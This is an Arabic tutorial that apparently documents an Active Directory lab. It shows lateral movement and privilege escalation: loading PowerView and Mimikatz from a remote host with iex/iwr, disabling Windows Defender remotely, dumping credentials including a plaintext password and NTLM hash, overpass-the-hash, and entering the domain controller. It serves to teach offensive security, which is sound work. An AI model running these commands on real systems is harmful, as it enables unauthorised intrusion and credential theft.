Privilege Escalation And Lateral Movement Part 2
السلام عليكم ورحمة الله وبركاته
الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:
مقدمة:
في هذي المقالة راح نكمل الى ماوصلنا له اللي هو بعد اختراق ال CMS وكان هذا ال CMS شغال بصلاحية Local Administrators بيوزر اسمه ciadmin
ف يفضل تتابع المقالة السابقة عشان تكون بالصورة
المقالة السابقة
الشرح:
في المقالة السابقة تم تشغيل Mimikatz واطلعنا على الباسورد اللي في الميموري ولاحظنا انه مافي اي باسورد لمستخدم يهمنا عشان ودنا نتقدم بالاختراق الى مانوصل الى Domain Controllers
الان راح اسوي Load ل اداة Power View في الميموري عن طريق هذا الامر:
iex (iwr http://172.16.100.7:9090/PowerView.ps1 -UseBasicParsing)
راح ننفذ هذا الامر
Invoke-UserHunter -CheckAccess
ايش فايدة امر Invoke-UserHunter ؟
هذا الامر راح يشيك لي على كل الاجهزة اللي داخل ال Domain هل يوجد عليها مستخدم ضمن قروب Domain Admins مسجل دخول على جهاز معين
وهل هذا الجهاز لنا Access عليه ك Local Administrator او لا
طيب ايش راح نستفيد؟
طبعا لو نفذنا الامر وطلع فعلا انه احد الاجهزة مسجل عليه دخول مستخدم ضمن قروب Domain Admins راح نقدر نشغل Mimikatz وناخذ ال NTLM الخاص في هذا المستخدم وبما انه ضمن Domain Admins راح نتمكن من الدخول على Domain Controller
نلاحظ مع بعض انه الجهاز اللي هو dcorp-mgmt يوجد عليه مستخدم svcadmin وهذا المستخدم ضمن قروب Domain Admins وعندنا صلاحية Local Administrator على هذا الجهاز
الان راح ننفذ اوامر على هذا الجهاز عن طريق هذا الامر
Invoke-Command -Computername dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock {whoami;hostname}
الان راح نسوي Load ل اداة ال Mimikatz بس قبل لازم نسوي Disable للويندوز ديفندر عن طريق هذا الامر
Invoke-Command -Computername dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock {Set-MpPreference -DisableRealtimeMonitoring $true}
بعدين نسوي Load ل اداة Mimikatz في الميموري عن طريق هذا الامر
iex (iwr http://172.16.100.7:9090/Invoke-Mimikatz.ps1 -UseBasicParsing)
الان نستدعي Mimikatz في جهاز dcrop-mgmt عن طريق هذا الامر
Invoke-Command -Computername dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock ${function:Invoke-Mimikatz}
الان زي مانلاحظ انه عندنا الباسورد ك Plain text واللي هو : *ThisisBlasphemyThisisMadness!!
وعندنا ك Ntlm hash و اللي هو : b38ff50264b74508085d82c69794a4d8
انا راح استخدم الخاص بال NTLM HASH عشان اعلمكم على تكنيك Overpass-the-hash لان مو دائما يظهر لك الباسورد ك Plain text عن طريق اداة Mimikatz
الان راح ننفذ تكنيك Overpass-the-hash
راح نفتج powershell بصلاحية Administrator من جهازنا ونشغل اداة Mimikatz
وننفذ هذا الامر عشان يفتح لنا جلسة PowerShell بصلاحية المستخدم svcadmin
sekurlsa::pth /user:svcadmin /ntlm:b38ff50264b74508085d82c69794a4d8 /domain:dollarcorp.moneycorp.local /run:powershell.exe
زي مانلاحظ انه فتح لنا جلسة بورشيل خاصة بالمستخدم svcadmin
الان بما ان المستخدم اللي داخلين فيه ضمن قروب Domain Admins يمكننا الدخول على جهاز ال Domain Controller طبعا كيف راح نعرف ايش اسم الجهاز الخاص بال Domain Controller
في اكثر من طريقه ممكن عن طريق اداة PowerView او عن طريق ال Mimikatz
نحن راح نستخرجه عن طريق اداة PowerView
راح نفتح جلسة PowerShell ونسوي Load ل اداة PowerView عن طريق هذا الامر
Import-Module .\PowerView.ps1
بعد كذا ننفذ هذا الامر عشان يظهر لنا اسم الجهاز الخاص بال Domain Controller
Get-NetDomain
زي مانلاحظ اسم الجهاز الخاص بال Domain Controller هو :
dcorp-dc.dollarcorp.moneycorp.local
الان كل اللي علينا نرجع للجلسة الخاصة بالمستخدم svcadmin وندخل لجهاز Domain Controller عن طريق هذا الامر:
Enter-PSSession -ComputerName dcorp-dc
وبكذا وصلنا الى اعلى صلاحية في ال Active Directory
اتمنى المقالة نالت على اعجابكم
شاكر لكم.
التعليقات (0)
لايوجد لديك حساب في عالم البرمجة؟
تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !